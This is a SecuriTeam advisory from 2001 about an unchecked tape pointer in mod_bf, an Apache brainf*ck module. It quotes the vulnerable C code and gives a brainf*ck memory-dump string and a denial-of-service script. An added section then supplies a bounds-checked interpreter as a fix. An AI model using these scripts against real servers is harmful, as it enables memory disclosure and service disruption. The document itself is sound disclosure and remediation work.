[UNIX] Apache's mod_bf Vulnerable to a Buffer Overflow and DoS

From: support@securiteam.com
Date: 12/25/01


From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 25 Dec 2001 22:08:37 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Apache's mod_bf Vulnerable to a Buffer Overflow and DoS
------------------------------------------------------------------------

SUMMARY

 <http://sourceforge.net/projects/modbf/> mod_bf is a brainf*ck
interpreter that interprets .bf files on Apache web server machines
(Brainf*ck is a very simple, low-level language that allows the creation of
fast-running code snippets). A security vulnerability in the product allows
remote attackers to execute arbitrary commands by overflowing an internal
buffer.

DETAILS

Vulnerable systems:
mod_bf version 0.1 under FreeBSD ports
mod_bf version 0.2

Relevant code fragment from mod_bf.c (req is a request_rec pointer used by
the interpreter that is not shown in this fragment; CRLF is Apache's "\r\n"
macro; the ellipses mark code omitted from the advisory):
  #define ARR_SIZE 100

  static char a[ARR_SIZE];   /* the interpreter's tape: 100 bytes */
  static int p;              /* tape pointer into a[]; never bounds-checked */

    ...

  static int bf_handler(request_rec *r)
  {
    ...

      memset (a, 0, ARR_SIZE);   /* tape is cleared for every request */
      p = 0;

    ...

      if (!r->header_only)
        interpret (c);           /* c holds the .bf script to run */

    ...

  }

  static void interpret(char *c)
  {
      int b;
      char *d;

      for (; *c; c++) {
        switch (*c) {
        case DEBUG_PR:
          for (b = 0; b < 10; b++)
            ap_rprintf (req, "a[%d]: %d" CRLF, b, a[b]);
          ap_rprintf (req, "a[p]: %d p: %d" CRLF, a[p], p);
          ap_rflush (req);
          ap_reset_timeout (req);
          break;
        case '+':
          a[p]++;                /* write through p, wherever p points */
          break;
        case '-':
          a[p]--;
          break;
        case '>':
          p++;                   /* no check against ARR_SIZE */
          break;
        case '<':
          p--;                   /* no check against 0: p can go negative */
          break;
        case '.':
          if (ap_rputc (a[p], req) == EOF)   /* reads through p, unchecked */
            return;
          ap_rflush (req);
          ap_reset_timeout (req);
          break;
        case ',':
          if ((a[p] = *req->args) == EOF || a[p] == CR)
            a[p] = 0;
          req->args++;
          ap_reset_timeout (req);
          break;
        case '[':
          /* the idea of the following is borrowed from bfi */
          d = ++c;
          for (b = 1; b && *c; c++)
            b += (*c == '[' ? 1 : (*c == ']' ? -1 : 0));
          if (!b) {
            *--c = 0;
            while (a[p])
              interpret (d);
            *c = ']';
          }
          break;
        }
      }
  }

a[] is an array of 100 bytes. p is an integer index into that array that
selects the current memory location. It can be increased with > or decreased
with <, and the byte at a[p] can be modified with + or -.

Because p is never bounds-checked, an attacker can write a script that
increases p so that p >= 100, or decreases it so that p becomes negative,
and then set the memory location pointed to by a[p] to an arbitrary value
(using only the '+' and '-' commands).

Further, an attacker can dump sensitive memory by using the '.' command:
  <.<.<.<.<.<.<.<.

DoS example:
$ cat > ~GOBBLES/public_html/bad.bf
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>
+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+
>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>
+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+
>+>+>
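The missing check is the whole bug: every tape move in mod_bf's interpret()
is applied before anyone asks whether it still lands inside a[]. The
following is an added example, not mod_bf's code, showing the same
brainf*ck loop with the tape pointer validated on every '>' and '<', plus a
step budget so a looping script cannot tie up an Apache worker. The
ARR_SIZE of 100 is taken from the advisory; the status codes, bf_run()
and the constructed bf_overrun_program() input (100 '>' then '+', the shape
of the DoS script above) are assumptions of this example. The ',' command is
left out because mod_bf reads it from the query string.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not mod_bf's code: a bounds-checked brainf*ck interpreter
 * using the same 100-byte tape (ARR_SIZE) as the advisory's fragment.
 * Every tape move is validated before it happens, so '>' and '<' can never
 * take the pointer outside a[], and a step budget stops runaway loops. */
#define ARR_SIZE 100

enum bf_status {
    BF_OK = 0,
    BF_ERR_TAPE_OOB = 1,     /* '>' or '<' would leave [0, ARR_SIZE) */
    BF_ERR_UNBALANCED = 2,   /* '[' or ']' without a partner */
    BF_ERR_STEPS = 3         /* exceeded the step budget */
};

/* Run prog; bytes emitted by '.' go into out (at most outsz-1, NUL-terminated).
 * Returns BF_OK or one of the error codes above; on error the tape pointer
 * has never left the array. ',' is not supported in this example. */
int bf_run(const char *prog, char *out, size_t outsz, unsigned long max_steps)
{
    unsigned char a[ARR_SIZE];
    size_t p = 0, o = 0, n = strlen(prog), i;
    unsigned long steps = 0;

    memset(a, 0, sizeof a);
    if (outsz) out[0] = '\0';

    for (i = 0; i < n; i++) {
        if (++steps > max_steps)
            return BF_ERR_STEPS;
        switch (prog[i]) {
        case '+': a[p]++; break;
        case '-': a[p]--; break;
        case '>':
            if (p + 1 >= ARR_SIZE)       /* mod_bf did an unchecked p++ */
                return BF_ERR_TAPE_OOB;
            p++;
            break;
        case '<':
            if (p == 0)                  /* mod_bf did an unchecked p-- */
                return BF_ERR_TAPE_OOB;
            p--;
            break;
        case '.':
            if (o + 1 < outsz) {         /* output buffer is bounded too */
                out[o++] = (char)a[p];
                out[o] = '\0';
            }
            break;
        case '[':                        /* skip past matching ']' if a[p] == 0 */
            if (a[p] == 0) {
                int depth = 1;
                while (depth) {
                    if (++i >= n)
                        return BF_ERR_UNBALANCED;
                    if (prog[i] == '[') depth++;
                    else if (prog[i] == ']') depth--;
                }
            }
            break;
        case ']':                        /* jump back to matching '[' if a[p] != 0 */
            if (a[p] != 0) {
                int depth = 1;
                while (depth) {
                    if (i == 0)
                        return BF_ERR_UNBALANCED;
                    i--;
                    if (prog[i] == ']') depth++;
                    else if (prog[i] == '[') depth--;
                }
            }
            break;
        default:
            break;                       /* any other byte is a comment */
        }
    }
    return BF_OK;
}

/* Constructed input: 100 '>' followed by '+'. In mod_bf this increments
 * a[100], one byte past the array; here the 100th '>' is rejected. */
const char *bf_overrun_program(void)
{
    static char buf[ARR_SIZE + 2];
    memset(buf, '>', ARR_SIZE);
    buf[ARR_SIZE] = '+';
    buf[ARR_SIZE + 1] = '\0';
    return buf;
}

int main(void)
{
    char out[64];
    int rc = bf_run("++++++++[>++++++++<-]>+.", out, sizeof out, 100000UL);
    printf("well-formed program: status %d, output \"%s\"\n", rc, out);
    rc = bf_run(bf_overrun_program(), out, sizeof out, 100000UL);
    printf("overrun program: status %d (BF_ERR_TAPE_OOB is %d)\n", rc, BF_ERR_TAPE_OOB);
    rc = bf_run("<.", out, sizeof out, 100000UL);
    printf("underflow program: status %d (BF_ERR_TAPE_OOB is %d)\n", rc, BF_ERR_TAPE_OOB);
    return 0;
}
```

The checks sit on the move, not on the access, so a rejected script never
reaches the a[p] read or write; the handler in a real module would map a
non-zero status to an HTTP error instead of serving partial output.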

ADDITIONAL INFORMATION

The information has been provided by Gobbles.



